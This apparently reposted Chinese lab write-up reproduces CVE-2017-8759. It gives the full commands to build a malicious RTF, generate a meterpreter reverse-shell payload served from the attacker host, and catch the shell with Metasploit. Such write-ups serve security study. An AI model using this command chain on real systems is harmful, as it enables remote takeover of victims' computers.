CVE-2017-8759 复现
来源:互联网 发布:python 不显示warning 编辑:程序博客网 时间:2024/05/18 01:18
漏洞成因:近日,360集团核心安全事业部分析团队发现一个新型的Office文档高级威胁攻击,攻击使用了9月12日补丁刚修复的.NET Framework漏洞,该漏洞在野外被利用时为0day状态,用户打开恶意的Office文档就会中招。该漏洞的技术原理和今年黑客“奥斯卡”Pwnie Awards上的最佳客户端漏洞(CVE-2017-0199)如出一辙,不同的是,这次黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码,而整个漏洞的罪魁祸首竞是.NET Framework一个换行符处理失误。(出自: 一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现:最新的Office高级威胁攻击预警)
利用文件:这里我直接利用的github上一个大牛的POC,里面详细介绍了用法。
https://github.com/bhdresh/CVE-2017-8759.git
环境搭建:靶机:windows 7 ip:172.16.9.53
攻击机:kali linux ip:172.16.9.110
利用过程:
1.首先获取github上的POC。
2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件invoice.rtf。
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://172.16.9.110/logo.txt
3.利用msfVENOM生成一个反弹shell的exe文件,并命名为shell.exe。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.9.110 LPORT=4444 -f exe > /root/shell.exe
4.我们需要监听来自ppsx文件执行之后反弹的shell。
pythoncve-2017-8759_toolkit.py -M exp -e http://172.16.9.110/shell.exe -l/root/shell.exe
5.开启metasploit的监听模块exploit/multi/handler进行监听。
msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 172.16.9.110; run"
6.把恶意rtf文件发送到win7靶机上,当恶意文件被执行后,msf监听到反弹shell,然后建立会话连接,进入meterpreter,即可获取靶机控制权。
至此复现成功,感谢大家的阅读!!!
原文地址:https://bbs.ichunqiu.com/thread-27342-1-1.html
阅读全文
0 0
- CVE-2017-8759 复现
- MS Office 漏洞CVE-2017-8759复现
- CVE-2017-11882复现
- 渗透笔记7:CVE-2017-11882复现
- Office CVE-2017-11882本地复现
- CVE-2017-8759完美复现(另附加hta+powershell弹框闪烁解决方案)
- CVE-2017-9805(Struts2 漏洞复现与分析)
- Tomcat任意文件上传漏洞CVE-2017-12615复现测试
- Office CVE-2017-8570远程代码执行漏洞复现
- 微软office远程代码执行漏洞(CVE-2017-11882)复现
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- 复现dirtycow——CVE-2016-5195
- CVE-2017-8759
- [Mobile Security] - CVE漏洞复现虚拟团队呼唤小伙伴
- [漏洞] CVE-2017-1000364/CVE-2017-1000365/CVE-2017-1000366
- CVE-2017-0214
- CVE-2017-0214Poc
- CVE
- 4.11 import 语句
- Hadoop2.6.4搭建笔记
- Vue+Webpack引入Jquery第三方插件,jQuery is not defined 错误,解决方案
- js多余的内容显示省略号
- postman工具使用总结
- CVE-2017-8759 复现
- 杂谈:信息帅选和工作习惯思维改变
- 常见的几种特征
- runLoop 概念解析
- 【Scikit-Learn 中文文档】多类和多标签算法
- 4.12 访问权限
- mysql事务的隔离级别
- 找出所有符合条件的记录的指定字段并分组统计个数,返回指定格式。
- HDOJ 1977 Consecutive sum II